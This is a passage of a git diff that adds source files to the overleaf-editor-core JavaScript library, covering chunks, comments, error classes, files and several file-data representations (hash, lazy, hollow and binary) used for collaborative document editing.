(!this.history.countChanges()) return null + return this.history.getChanges().slice(-1)[0].getTimestamp() + } + + /** + * The version of the project before applying all changes in this chunk. + * + * @return {number} non-negative, less than or equal to end version + */ + getStartVersion() { + return this.startVersion + } + + /** + * {@see History#loadFiles} + * + * @param {string} kind + * @param {BlobStore} blobStore + * @return {Promise} + */ + async loadFiles(kind, blobStore) { + await this.history.loadFiles(kind, blobStore) + } +} + +module.exports = Chunk diff --git a/libraries/overleaf-editor-core/lib/chunk_response.js b/libraries/overleaf-editor-core/lib/chunk_response.js new file mode 100644 index 0000000..454d0de --- /dev/null +++ b/libraries/overleaf-editor-core/lib/chunk_response.js @@ -0,0 +1,33 @@ +'use strict' + +const assert = require('check-types').assert +const Chunk = require('./chunk') + +/** + * The ChunkResponse allows for additional data to be sent back with the chunk + * at present there are no extra data to send. + */ +class ChunkResponse { + constructor(chunk) { + assert.instance(chunk, Chunk) + this.chunk = chunk + } + + toRaw() { + return { + chunk: this.chunk.toRaw(), + } + } + + static fromRaw(raw) { + if (!raw) return null + + return new ChunkResponse(Chunk.fromRaw(raw.chunk)) + } + + getChunk() { + return this.chunk + } +} + +module.exports = ChunkResponse diff --git a/libraries/overleaf-editor-core/lib/comment.js b/libraries/overleaf-editor-core/lib/comment.js new file mode 100644 index 0000000..89a56dd --- /dev/null +++ b/libraries/overleaf-editor-core/lib/comment.js @@ -0,0 +1,206 @@ +// @ts-check +const { RetainOp, InsertOp, RemoveOp } = require('./operation/scan_op') +const Range = require('./range') + +/** + * @import { CommentRawData } from "./types" + * @import TextOperation from "./operation/text_operation" + */ + +class Comment { + /** + * @readonly + * @type {ReadonlyArray} + */ + ranges = [] + + /** + * @readonly + * @type {boolean} + */ + resolved = false + + /** + * @param {string} id + * @param {ReadonlyArray} ranges + * @param {boolean} [resolved] + */ + constructor(id, ranges, resolved = false) { + this.id = id + this.resolved = resolved + this.ranges = this.mergeRanges(ranges) + } + + /** + * + * @param {number} cursor + * @param {number} length + * @param {boolean} [extendComment] + * @returns {Comment} + */ + applyInsert(cursor, length, extendComment = false) { + let existingRangeExtended = false + const newRanges = [] + + for (const commentRange of this.ranges) { + if (cursor === commentRange.end) { + // insert right after the comment + if (extendComment) { + newRanges.push(commentRange.extendBy(length)) + existingRangeExtended = true + } else { + newRanges.push(commentRange) + } + } else if (cursor === commentRange.start) { + // insert at the start of the comment + if (extendComment) { + newRanges.push(commentRange.extendBy(length)) + existingRangeExtended = true + } else { + newRanges.push(commentRange.moveBy(length)) + } + } else if (commentRange.startIsAfter(cursor)) { + // insert before the comment + newRanges.push(commentRange.moveBy(length)) + } else if (commentRange.containsCursor(cursor)) { + // insert is inside the comment + if (extendComment) { + newRanges.push(commentRange.extendBy(length)) + existingRangeExtended = true + } else { + const [rangeUpToCursor, , rangeAfterCursor] = commentRange.insertAt( + cursor, + length + ) + + // use current commentRange for the part before the cursor + newRanges.push(new Range(commentRange.pos, rangeUpToCursor.length)) + // add the part after the cursor as a new range + newRanges.push(rangeAfterCursor) + } + } else { + // insert is after the comment + newRanges.push(commentRange) + } + } + + // if the insert is not inside any range, add a new range + if (extendComment && !existingRangeExtended) { + newRanges.push(new Range(cursor, length)) + } + + return new Comment(this.id, newRanges, this.resolved) + } + + /** + * + * @param {Range} deletedRange + * @returns {Comment} + */ + applyDelete(deletedRange) { + const newRanges = [] + + for (const commentRange of this.ranges) { + if (commentRange.overlaps(deletedRange)) { + newRanges.push(commentRange.subtract(deletedRange)) + } else if (commentRange.startsAfter(deletedRange)) { + newRanges.push(commentRange.moveBy(-deletedRange.length)) + } else { + newRanges.push(commentRange) + } + } + + return new Comment(this.id, newRanges, this.resolved) + } + + /** + * + * @param {TextOperation} operation + * @param {string} commentId + * @returns {Comment} + */ + applyTextOperation(operation, commentId) { + /** @type {Comment} */ + let comment = this + let cursor = 0 + for (const op of operation.ops) { + if (op instanceof RetainOp) { + cursor += op.length + } else if (op instanceof InsertOp) { + comment = comment.applyInsert( + cursor, + op.insertion.length, + op.commentIds?.includes(commentId) + ) + cursor += op.insertion.length + } else if (op instanceof RemoveOp) { + comment = comment.applyDelete(new Range(cursor, op.length)) + } + } + return comment + } + + isEmpty() { + return this.ranges.length === 0 + } + + /** + * + * @returns {CommentRawData} + */ + toRaw() { + /** @type CommentRawData */ + const raw = { + id: this.id, + ranges: this.ranges.map(range => range.toRaw()), + } + if (this.resolved) { + raw.resolved = true + } + return raw + } + + /** + * @param {ReadonlyArray} ranges + * @returns {ReadonlyArray} + */ + mergeRanges(ranges) { + /** @type {Range[]} */ + const mergedRanges = [] + + const sortedRanges = [...ranges].sort((a, b) => a.start - b.start) + for (const range of sortedRanges) { + if (range.isEmpty()) { + continue + } + const lastMerged = mergedRanges[mergedRanges.length - 1] + if (lastMerged?.overlaps(range)) { + throw new Error('Ranges cannot overlap') + } + if (range.isEmpty()) { + throw new Error('Comment range cannot be empty') + } + if (lastMerged?.canMerge(range)) { + mergedRanges[mergedRanges.length - 1] = lastMerged.merge(range) + } else { + mergedRanges.push(range) + } + } + + return mergedRanges + } + + /** + * @param {CommentRawData} rawComment + * @returns {Comment} + */ + static fromRaw(rawComment) { + return new Comment( + rawComment.id, + rawComment.ranges.map(range => Range.fromRaw(range)), + rawComment.resolved + ) + } +} + +module.exports = Comment diff --git a/libraries/overleaf-editor-core/lib/errors.js b/libraries/overleaf-editor-core/lib/errors.js new file mode 100644 index 0000000..b384cc1 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/errors.js @@ -0,0 +1,34 @@ +const OError = require('@overleaf/o-error') + +class UnprocessableError extends OError {} + +class ApplyError extends UnprocessableError { + constructor(message, operation, operand) { + super(message) + this.operation = operation + this.operand = operand + } +} + +class InvalidInsertionError extends UnprocessableError { + constructor(str, operation) { + super('inserted text contains non BMP characters') + this.str = str + this.operation = operation + } +} + +class TooLongError extends UnprocessableError { + constructor(operation, resultLength) { + super('resulting string would be too long', { resultLength }) + this.operation = operation + this.resultLength = resultLength + } +} + +module.exports = { + UnprocessableError, + ApplyError, + InvalidInsertionError, + TooLongError, +} diff --git a/libraries/overleaf-editor-core/lib/file.js b/libraries/overleaf-editor-core/lib/file.js new file mode 100644 index 0000000..b5321c3 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file.js @@ -0,0 +1,280 @@ +// @ts-check +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert + +const OError = require('@overleaf/o-error') +const FileData = require('./file_data') +const HashFileData = require('./file_data/hash_file_data') +const StringFileData = require('./file_data/string_file_data') + +/** + * @import Blob from "./blob" + * @import { BlobStore, ReadonlyBlobStore, RawFileData, RawFile } from "./types" + * @import { StringFileRawData, CommentRawData } from "./types" + * @import CommentList from "./file_data/comment_list" + * @import TextOperation from "./operation/text_operation" + * @import TrackedChangeList from "./file_data/tracked_change_list" + * + * @typedef {{filterTrackedDeletes?: boolean}} FileGetContentOptions + */ + +class NotEditableError extends OError { + constructor() { + super('File is not editable') + } +} + +/** + * A file in a {@link Snapshot}. A file has both data and metadata. There + * are several classes of data that represent the various types of file + * data that are supported, namely text and binary, and also the various + * states that a file's data can be in, namely: + * + * 1. Hash only: all we know is the file's hash; this is how we encode file + * content in long term storage. + * 2. Lazily loaded: the hash of the file, its length, and its type are known, + * but its content is not loaded. Operations are cached for application + * later. + * 3. Eagerly loaded: the content of a text file is fully loaded into memory + * as a string. + * 4. Hollow: only the byte and/or UTF-8 length of the file are known; this is + * used to allow for validation of operations when editing collaboratively + * without having to keep file data in memory on the server. + */ +class File { + /** + * Blob hash for an empty file. + * + * @type {String} + */ + static EMPTY_FILE_HASH = 'e69de29bb2d1d6434b8b29ae775ad8c2e48c5391' + + static NotEditableError = NotEditableError + + /** + * @param {FileData} data + * @param {Object} [metadata] + */ + constructor(data, metadata) { + assert.instance(data, FileData, 'File: bad data') + + this.data = data + this.metadata = {} + this.setMetadata(metadata || {}) + } + + /** + * @param {RawFile} raw + * @return {File|null} + */ + static fromRaw(raw) { + if (!raw) return null + return new File(FileData.fromRaw(raw), raw.metadata) + } + + /** + * @param {string} hash + * @param {string} [rangesHash] + * @param {Object} [metadata] + * @return {File} + */ + static fromHash(hash, rangesHash, metadata) { + return new File(new HashFileData(hash, rangesHash), metadata) + } + + /** + * @param {string} string + * @param {Object} [metadata] + * @return {File} + */ + static fromString(string, metadata) { + return new File(new StringFileData(string), metadata) + } + + /** + * @param {number} byteLength + * @param {number} [stringLength] + * @param {Object} [metadata] + * @return {File} + */ + static createHollow(byteLength, stringLength, metadata) { + return new File(FileData.createHollow(byteLength, stringLength), metadata) + } + + /** + * @param {Blob} blob + * @param {Blob} [rangesBlob] + * @param {Object} [metadata] + * @return {File} + */ + static createLazyFromBlobs(blob, rangesBlob, metadata) { + return new File(FileData.createLazyFromBlobs(blob, rangesBlob), metadata) + } + + /** + * @returns {RawFile} + */ + toRaw() { + /** @type RawFile */ + const rawFileData = this.data.toRaw() + storeRawMetadata(this.metadata, rawFileData) + return rawFileData + } + + /** + * Hexadecimal SHA-1 hash of the file's content, if known. + * + * @return {string | null | undefined} + */ + getHash() { + return this.data.getHash() + } + + /** + * Hexadecimal SHA-1 hash of the ranges content (comments + tracked changes), + * if known. + * + * @return {string | null | undefined} + */ + getRangesHash() { + return this.data.getRangesHash() + } + + /** + * The content of the file, if it is known and if this file has UTF-8 encoded + * content. + * + * @param {FileGetContentOptions} [opts] + * @return {string | null | undefined} + */ + getContent(opts = {}) { + return this.data.getContent(opts) + } + + /** + * Whether this file has string content and is small enough to be edited using + * {@link TextOperation}s. + * + * @return {boolean | null | undefined} null if it is not currently known + */ + isEditable() { + return this.data.isEditable() + } + + /** + * The length of the file's content in bytes, if known. + * + * @return {number | null | undefined} + */ + getByteLength() { + return this.data.getByteLength() + } + + /** + * The length of the file's content in characters, if known. + * + * @return {number | null | undefined} + */ + getStringLength() { + return this.data.getStringLength() + } + + /** + * Return the metadata object for this file. + * + * @return {Object} + */ + getMetadata() { + return this.metadata + } + + /** + * Set the metadata object for this file. + * + * @param {Object} metadata + */ + setMetadata(metadata) { + assert.object(metadata, 'File: bad metadata') + this.metadata = metadata + } + + /** + * Edit this file, if possible. + * + * @param {TextOperation} textOperation + */ + edit(textOperation) { + if (!this.data.isEditable()) throw new File.NotEditableError() + this.data.edit(textOperation) + } + + /** + * Get the comments for this file. + * + * @return {CommentList} + */ + getComments() { + return this.data.getComments() + } + + /** + * Get the tracked changes for this file. + * @return {TrackedChangeList} + */ + getTrackedChanges() { + return this.data.getTrackedChanges() + } + + /** + * Clone a file. + * + * @return {File} a new object of the same type + */ + clone() { + return /** @type {File} */ (File.fromRaw(this.toRaw())) + } + + /** + * Convert this file's data to the given kind. This may require us to load file + * size or content from the given blob store, so this is an asynchronous + * operation. + * + * @param {string} kind + * @param {ReadonlyBlobStore} blobStore + * @return {Promise.} for this + */ + async load(kind, blobStore) { + const data = await this.data.load(kind, blobStore) + this.data = data + return this + } + + /** + * Store the file's content in the blob store and return a raw file with + * the corresponding hash. As a side effect, make this object consistent with + * the hash. + * + * @param {BlobStore} blobStore + * @return {Promise} a raw HashFile + */ + async store(blobStore) { + /** @type RawFile */ + const raw = await this.data.store(blobStore) + storeRawMetadata(this.metadata, raw) + return raw + } +} + +/** + * @param {Object} metadata + * @param {RawFile} raw + */ +function storeRawMetadata(metadata, raw) { + if (!_.isEmpty(metadata)) { + raw.metadata = _.cloneDeep(metadata) + } +} + +module.exports = File diff --git a/libraries/overleaf-editor-core/lib/file_data/binary_file_data.js b/libraries/overleaf-editor-core/lib/file_data/binary_file_data.js new file mode 100644 index 0000000..7919634 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/binary_file_data.js @@ -0,0 +1,82 @@ +'use strict' + +const assert = require('check-types').assert + +const Blob = require('../blob') +const FileData = require('./') + +/** + * @import { RawBinaryFileData } from '../types' + */ + +class BinaryFileData extends FileData { + /** + * @param {string} hash + * @param {number} byteLength + * @see FileData + */ + constructor(hash, byteLength) { + super() + assert.match(hash, Blob.HEX_HASH_RX, 'BinaryFileData: bad hash') + assert.integer(byteLength, 'BinaryFileData: bad byteLength') + assert.greaterOrEqual(byteLength, 0, 'BinaryFileData: low byteLength') + + this.hash = hash + this.byteLength = byteLength + } + + /** + * @param {RawBinaryFileData} raw + * @returns {BinaryFileData} + */ + static fromRaw(raw) { + return new BinaryFileData(raw.hash, raw.byteLength) + } + + /** + * @inheritdoc + * @returns {RawBinaryFileData} + */ + toRaw() { + return { hash: this.hash, byteLength: this.byteLength } + } + + /** @inheritdoc */ + getHash() { + return this.hash + } + + /** @inheritdoc */ + isEditable() { + return false + } + + /** @inheritdoc */ + getByteLength() { + return this.byteLength + } + + /** @inheritdoc */ + async toEager() { + return this + } + + /** @inheritdoc */ + async toLazy() { + return this + } + + /** @inheritdoc */ + async toHollow() { + return FileData.createHollow(this.byteLength, null) + } + + /** @inheritdoc + * @return {Promise} + */ + async store() { + return { hash: this.hash } + } +} + +module.exports = BinaryFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/clear_tracking_props.js b/libraries/overleaf-editor-core/lib/file_data/clear_tracking_props.js new file mode 100644 index 0000000..ba7f0bf --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/clear_tracking_props.js @@ -0,0 +1,28 @@ +// @ts-check + +/** + * @import { ClearTrackingPropsRawData } from '../types' + */ + +class ClearTrackingProps { + constructor() { + this.type = 'none' + } + + /** + * @param {any} other + * @returns {boolean} + */ + equals(other) { + return other instanceof ClearTrackingProps + } + + /** + * @returns {ClearTrackingPropsRawData} + */ + toRaw() { + return { type: 'none' } + } +} + +module.exports = ClearTrackingProps diff --git a/libraries/overleaf-editor-core/lib/file_data/comment_list.js b/libraries/overleaf-editor-core/lib/file_data/comment_list.js new file mode 100644 index 0000000..69e5529 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/comment_list.js @@ -0,0 +1,124 @@ +// @ts-check +const Comment = require('../comment') + +/** + * @import { CommentRawData } from "../types" + * @import Range from "../range" + */ + +class CommentList { + /** + * @param {Comment[]} comments + */ + constructor(comments) { + this.comments = new Map(comments.map(comment => [comment.id, comment])) + } + + /** + * @returns {IterableIterator} + */ + [Symbol.iterator]() { + return this.comments.values() + } + + /** + * Returns the contents of this list in an array + * + * @returns {Comment[]} + */ + toArray() { + return Array.from(this) + } + + /** + * Return the length of the comment list + * + * @returns {number} + */ + get length() { + return this.comments.size + } + + /** + * Return the raw version of the comment list + * + * @returns {CommentRawData[]} + */ + toRaw() { + const raw = [] + for (const comment of this.comments.values()) { + raw.push(comment.toRaw()) + } + return raw + } + + /** + * @param {string} id + * @returns {Comment | undefined} + */ + getComment(id) { + return this.comments.get(id) + } + + /** + * @param {Comment} newComment + */ + add(newComment) { + this.comments.set(newComment.id, newComment) + } + + /** + * @param {string} id + */ + delete(id) { + return this.comments.delete(id) + } + + /** + * @param {CommentRawData[]} rawComments + */ + static fromRaw(rawComments) { + return new CommentList(rawComments.map(Comment.fromRaw)) + } + + /** + * @param {Range} range + * @param {{ commentIds?: string[] }} opts + */ + applyInsert(range, opts = { commentIds: [] }) { + if (!opts.commentIds) { + opts.commentIds = [] + } + for (const [commentId, comment] of this.comments) { + const commentAfterInsert = comment.applyInsert( + range.pos, + range.length, + opts.commentIds.includes(commentId) + ) + this.comments.set(commentId, commentAfterInsert) + } + } + + /** + * @param {Range} range + */ + applyDelete(range) { + for (const [commentId, comment] of this.comments) { + const commentAfterDelete = comment.applyDelete(range) + this.comments.set(commentId, commentAfterDelete) + } + } + + /** + * + * @param {Range} range + * @returns {string[]} + */ + idsCoveringRange(range) { + return Array.from(this.comments.entries()) + .filter(([, comment]) => comment.ranges.some(r => r.contains(range))) + .map(([id]) => id) + } +} + +module.exports = CommentList diff --git a/libraries/overleaf-editor-core/lib/file_data/hash_file_data.js b/libraries/overleaf-editor-core/lib/file_data/hash_file_data.js new file mode 100644 index 0000000..d12da1c --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/hash_file_data.js @@ -0,0 +1,134 @@ +// @ts-check +'use strict' + +const assert = require('check-types').assert + +const Blob = require('../blob') +const FileData = require('./') +/** + * @import StringFileData from './string_file_data' + * @import LazyStringFileData from './lazy_string_file_data' + * @import HollowStringFileData from './hollow_string_file_data' + * @import { BlobStore, RawHashFileData } from '../types' + */ + +class HashFileData extends FileData { + /** + * @constructor + * @param {string} hash + * @param {string} [rangesHash] + * @see FileData + */ + constructor(hash, rangesHash) { + super() + assert.match(hash, Blob.HEX_HASH_RX, 'HashFileData: bad hash') + if (rangesHash) { + assert.match( + rangesHash, + Blob.HEX_HASH_RX, + 'HashFileData: bad ranges hash' + ) + } + this.hash = hash + this.rangesHash = rangesHash + } + + /** + * + * @param {RawHashFileData} raw + */ + static fromRaw(raw) { + return new HashFileData(raw.hash, raw.rangesHash) + } + + /** + * @inheritdoc + * @returns {RawHashFileData} + */ + toRaw() { + /** @type RawHashFileData */ + const raw = { hash: this.hash } + if (this.rangesHash) { + raw.rangesHash = this.rangesHash + } + return raw + } + + /** + * @inheritdoc + * @returns {string} + */ + getHash() { + return this.hash + } + + /** + * @inheritdoc + * @returns {string | undefined} + */ + getRangesHash() { + return this.rangesHash + } + + /** + * @inheritdoc + * @param {BlobStore} blobStore + * @returns {Promise} + */ + async toEager(blobStore) { + const lazyFileData = await this.toLazy(blobStore) + return await lazyFileData.toEager(blobStore) + } + + /** + * @inheritdoc + * @param {BlobStore} blobStore + * @returns {Promise} + */ + async toLazy(blobStore) { + const [blob, rangesBlob] = await Promise.all([ + blobStore.getBlob(this.hash), + this.rangesHash + ? blobStore.getBlob(this.rangesHash) + : Promise.resolve(undefined), + ]) + if (rangesBlob === null) { + // We attempted to look up the blob, but none was found + throw new Error('Failed to look up rangesHash in blobStore') + } + if (!blob) throw new Error('blob not found: ' + this.hash) + // TODO(das7pad): inline 2nd path of FileData.createLazyFromBlobs? + // @ts-ignore + return FileData.createLazyFromBlobs(blob, rangesBlob) + } + + /** + * @inheritdoc + * @param {BlobStore} blobStore + * @returns {Promise} + */ + async toHollow(blobStore) { + const blob = await blobStore.getBlob(this.hash) + if (!blob) { + throw new Error('Failed to look up hash in blobStore') + } + // TODO(das7pad): inline 2nd path of FileData.createHollow? + // @ts-ignore + return FileData.createHollow(blob.getByteLength(), blob.getStringLength()) + } + + /** + * @inheritdoc + * @returns {Promise} + */ + async store() { + /** @type RawHashFileData */ + const raw = { hash: this.hash } + if (this.rangesHash) { + raw.rangesHash = this.rangesHash + } + return raw + } +} + +module.exports = HashFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/hollow_binary_file_data.js b/libraries/overleaf-editor-core/lib/file_data/hollow_binary_file_data.js new file mode 100644 index 0000000..4187024 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/hollow_binary_file_data.js @@ -0,0 +1,55 @@ +'use strict' + +const assert = require('check-types').assert + +const FileData = require('./') + +/** + * @import { RawHollowBinaryFileData } from '../types' + */ + +class HollowBinaryFileData extends FileData { + /** + * @param {number} byteLength + * @see FileData + */ + constructor(byteLength) { + super() + assert.integer(byteLength, 'HollowBinaryFileData: bad byteLength') + assert.greaterOrEqual(byteLength, 0, 'HollowBinaryFileData: low byteLength') + this.byteLength = byteLength + } + + /** + * @param {RawHollowBinaryFileData} raw + * @returns {HollowBinaryFileData} + */ + static fromRaw(raw) { + return new HollowBinaryFileData(raw.byteLength) + } + + /** + * @inheritdoc + * @returns {RawHollowBinaryFileData} + */ + toRaw() { + return { byteLength: this.byteLength } + } + + /** @inheritdoc */ + getByteLength() { + return this.byteLength + } + + /** @inheritdoc */ + isEditable() { + return false + } + + /** @inheritdoc */ + async toHollow() { + return this + } +} + +module.exports = HollowBinaryFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/hollow_string_file_data.js b/libraries/overleaf-editor-core/lib/file_data/hollow_string_file_data.js new file mode 100644 index 0000000..717c060 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/hollow_string_file_data.js @@ -0,0 +1,69 @@ +// @ts-check +'use strict' + +const assert = require('check-types').assert + +const FileData = require('./') + +/** + * @import { RawHollowStringFileData } from '../types' + * @import EditOperation from '../operation/edit_operation' + */ + +class HollowStringFileData extends FileData { + /** + * @param {number} stringLength + * @see FileData + */ + constructor(stringLength) { + super() + assert.integer(stringLength, 'HollowStringFileData: bad stringLength') + assert.greaterOrEqual( + stringLength, + 0, + 'HollowStringFileData: low stringLength' + ) + this.stringLength = stringLength + } + + /** + * @param {RawHollowStringFileData} raw + * @returns {HollowStringFileData} + */ + static fromRaw(raw) { + return new HollowStringFileData(raw.stringLength) + } + + /** + * @inheritdoc + * @returns {RawHollowStringFileData} + */ + toRaw() { + return { stringLength: this.stringLength } + } + + /** @inheritdoc */ + getStringLength() { + return this.stringLength + } + + /** @inheritdoc */ + isEditable() { + return true + } + + /** @inheritdoc */ + async toHollow() { + return this + } + + /** + * @inheritdoc + * @param {EditOperation} operation + */ + edit(operation) { + this.stringLength = operation.applyToLength(this.stringLength) + } +} + +module.exports = HollowStringFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/index.js b/libraries/overleaf-editor-core/lib/file_data/index.js new file mode 100644 index 0000000..a6ae574 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/index.js @@ -0,0 +1,229 @@ +// @ts-check + +'use strict' + +const assert = require('check-types').assert + +const Blob = require('../blob') + +/** + * @import { BlobStore, ReadonlyBlobStore, RawFileData, CommentRawData } from "../types" + * @import EditOperation from "../operation/edit_operation" + * @import CommentList from "../file_data/comment_list" + * @import TrackedChangeList from "../file_data/tracked_change_list" + */ + +/** + * Helper to represent the content of a file. This class and its subclasses + * should be used only through {@link File}. + */ +class FileData { + /** @see File.fromRaw + * @param {RawFileData} raw + */ + static fromRaw(raw) { + // TODO(das7pad): can we teach typescript to understand our polymorphism? + if (Object.prototype.hasOwnProperty.call(raw, 'hash')) { + if (Object.prototype.hasOwnProperty.call(raw, 'byteLength')) + // @ts-ignore + return BinaryFileData.fromRaw(raw) + if (Object.prototype.hasOwnProperty.call(raw, 'stringLength')) + // @ts-ignore + return LazyStringFileData.fromRaw(raw) + // @ts-ignore + return HashFileData.fromRaw(raw) + } + if (Object.prototype.hasOwnProperty.call(raw, 'byteLength')) + // @ts-ignore + return HollowBinaryFileData.fromRaw(raw) + if (Object.prototype.hasOwnProperty.call(raw, 'stringLength')) + // @ts-ignore + return HollowStringFileData.fromRaw(raw) + if (Object.prototype.hasOwnProperty.call(raw, 'content')) + // @ts-ignore + return StringFileData.fromRaw(raw) + throw new Error('FileData: bad raw object ' + JSON.stringify(raw)) + } + + /** @see File.createHollow + * @param {number} byteLength + * @param {number} [stringLength] + */ + static createHollow(byteLength, stringLength) { + if (stringLength == null) { + return new HollowBinaryFileData(byteLength) + } + return new HollowStringFileData(stringLength) + } + + /** + * @see File.createLazyFromBlob + * @param {Blob} blob + * @param {Blob} [rangesBlob] + */ + static createLazyFromBlobs(blob, rangesBlob) { + assert.instance(blob, Blob, 'FileData: bad blob') + const stringLength = blob.getStringLength() + if (stringLength == null) { + return new BinaryFileData(blob.getHash(), blob.getByteLength()) + } + return new LazyStringFileData( + blob.getHash(), + rangesBlob?.getHash(), + stringLength + ) + } + + /** + * @returns {RawFileData} + */ + toRaw() { + throw new Error('FileData: toRaw not implemented') + } + + /** + * @see File#getHash + * @return {string | null | undefined} + */ + + getHash() { + return null + } + + /** + * @see File#getHash + * @return {string | null | undefined} + */ + getRangesHash() { + return null + } + + /** + * @see File#getContent + * @param {import('../file').FileGetContentOptions} [opts] + * @return {string | null | undefined} + */ + getContent(opts = {}) { + return null + } + + /** + * @see File#isEditable + * @return {boolean | null | undefined} null if it is not currently known + */ + isEditable() { + return null + } + + /** + * @see File#getByteLength + * @return {number | null | undefined} + */ + getByteLength() { + return null + } + + /** + * @see File#getStringLength + * @return {number | null | undefined} + */ + getStringLength() { + return null + } + + /** + * @see File#edit + * @param {EditOperation} editOperation + */ + edit(editOperation) { + throw new Error('edit not implemented for ' + JSON.stringify(this)) + } + + /** + * @function + * @param {ReadonlyBlobStore} blobStore + * @return {Promise} + * @abstract + * @see FileData#load + */ + async toEager(blobStore) { + throw new Error('toEager not implemented for ' + JSON.stringify(this)) + } + + /** + * @function + * @param {ReadonlyBlobStore} blobStore + * @return {Promise} + * @abstract + * @see FileData#load + */ + async toLazy(blobStore) { + throw new Error('toLazy not implemented for ' + JSON.stringify(this)) + } + + /** + * @function + * @param {ReadonlyBlobStore} blobStore + * @return {Promise} + * @abstract + * @see FileData#load + */ + async toHollow(blobStore) { + throw new Error('toHollow not implemented for ' + JSON.stringify(this)) + } + + /** + * @see File#load + * @param {string} kind + * @param {ReadonlyBlobStore} blobStore + * @return {Promise} + */ + async load(kind, blobStore) { + if (kind === 'eager') return await this.toEager(blobStore) + if (kind === 'lazy') return await this.toLazy(blobStore) + if (kind === 'hollow') return await this.toHollow(blobStore) + throw new Error('bad file data load kind: ' + kind) + } + + /** + * @see File#store + * @function + * @param {BlobStore} blobStore + * @return {Promise} a raw HashFile + * @abstract + */ + async store(blobStore) { + throw new Error('store not implemented for ' + JSON.stringify(this)) + } + + /** + * @see File#getComments + * @function + * @return {CommentList} + * @abstract + */ + getComments() { + throw new Error('getComments not implemented for ' + JSON.stringify(this)) + } + + /** + * @see File#getTrackedChanges + * @function + * @return {TrackedChangeList} + * @abstract + */ + getTrackedChanges() { + throw new Error( + 'getTrackedChanges not implemented for ' + JSON.stringify(this) + ) + } +} + +module.exports = FileData + +const BinaryFileData = require('./binary_file_data') +const HashFileData = require('./hash_file_data') +const HollowBinaryFileData = require('./hollow_binary_file_data') +const HollowStringFileData = require('./hollow_string_file_data') +const LazyStringFileData = require('./lazy_string_file_data') +const StringFileData = require('./string_file_data') diff --git a/libraries/overleaf-editor-core/lib/file_data/lazy_string_file_data.js b/libraries/overleaf-editor-core/lib/file_data/lazy_string_file_data.js new file mode 100644 index 0000000..bc11b3e --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/lazy_string_file_data.js @@ -0,0 +1,190 @@ +// @ts-check +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert + +const Blob = require('../blob') +const FileData = require('./') +const EagerStringFileData = require('./string_file_data') +const EditOperation = require('../operation/edit_operation') +const EditOperationBuilder = require('../operation/edit_operation_builder') + +/** + * @import { BlobStore, ReadonlyBlobStore, RangesBlob, RawFileData, RawLazyStringFileData } from '../types' + */ + +class LazyStringFileData extends FileData { + /** + * @param {string} hash + * @param {string | undefined} rangesHash + * @param {number} stringLength + * @param {Array.} [operations] + * @see FileData + */ + constructor(hash, rangesHash, stringLength, operations) { + super() + assert.match(hash, Blob.HEX_HASH_RX) + if (rangesHash) { + assert.match(rangesHash, Blob.HEX_HASH_RX) + } + assert.greaterOrEqual(stringLength, 0) + assert.maybe.array.of.instance(operations, EditOperation) + + this.hash = hash + this.rangesHash = rangesHash + this.stringLength = stringLength + this.operations = operations || [] + } + + /** + * @param {RawLazyStringFileData} raw + * @returns {LazyStringFileData} + */ + static fromRaw(raw) { + return new LazyStringFileData( + raw.hash, + raw.rangesHash, + raw.stringLength, + raw.operations && _.map(raw.operations, EditOperationBuilder.fromJSON) + ) + } + + /** + * @inheritdoc + * @returns {RawLazyStringFileData} + */ + toRaw() { + /** @type RawLazyStringFileData */ + const raw = { + hash: this.hash, + stringLength: this.stringLength, + } + if (this.rangesHash) { + raw.rangesHash = this.rangesHash + } + if (this.operations.length) { + raw.operations = _.map(this.operations, function (operation) { + return operation.toJSON() + }) + } + return raw + } + + /** @inheritdoc */ + getHash() { + if (this.operations.length) return null + return this.hash + } + + /** @inheritdoc */ + getRangesHash() { + if (this.operations.length) return null + return this.rangesHash + } + + /** @inheritdoc */ + isEditable() { + return true + } + + /** + * For project quota checking, we approximate the byte length by the UTF-8 + * length for hollow files. This isn't strictly speaking correct; it is an + * underestimate of byte length. + * + * @return {number} + */ + getByteLength() { + return this.stringLength + } + + /** @inheritdoc */ + getStringLength() { + return this.stringLength + } + + /** + * Get the cached text operations that are to be applied to this file to get + * from the content with its last known hash to its latest content. + * + * @return {Array.} + */ + getOperations() { + return this.operations + } + + /** + * @inheritdoc + * @param {ReadonlyBlobStore} blobStore + * @returns {Promise} + */ + async toEager(blobStore) { + const [content, ranges] = await Promise.all([ + blobStore.getString(this.hash), + this.rangesHash + ? /** @type {Promise} */ ( + blobStore.getObject(this.rangesHash) + ) + : Promise.resolve(undefined), + ]) + const file = new EagerStringFileData( + content, + ranges?.comments, + ranges?.trackedChanges + ) + applyOperations(this.operations, file) + return file + } + + /** @inheritdoc */ + async toLazy() { + return this + } + + /** @inheritdoc */ + async toHollow() { + // TODO(das7pad): inline 2nd path of FileData.createLazyFromBlobs? + // @ts-ignore + return FileData.createHollow(null, this.stringLength) + } + + /** @inheritdoc + * @param {EditOperation} operation + */ + edit(operation) { + this.stringLength = operation.applyToLength(this.stringLength) + this.operations.push(operation) + } + + /** @inheritdoc + * @param {BlobStore} blobStore + * @return {Promise} + */ + async store(blobStore) { + if (this.operations.length === 0) { + /** @type RawFileData */ + const raw = { hash: this.hash } + if (this.rangesHash) { + raw.rangesHash = this.rangesHash + } + return raw + } + const eager = await this.toEager(blobStore) + this.operations.length = 0 + /** @type RawFileData */ + return await eager.store(blobStore) + } +} + +/** + * + * @param {EditOperation[]} operations + * @param {EagerStringFileData} file + * @returns {void} + */ +function applyOperations(operations, file) { + _.each(operations, operation => operation.apply(file)) +} + +module.exports = LazyStringFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/string_file_data.js b/libraries/overleaf-editor-core/lib/file_data/string_file_data.js new file mode 100644 index 0000000..2613c30 --- /dev/null +++ 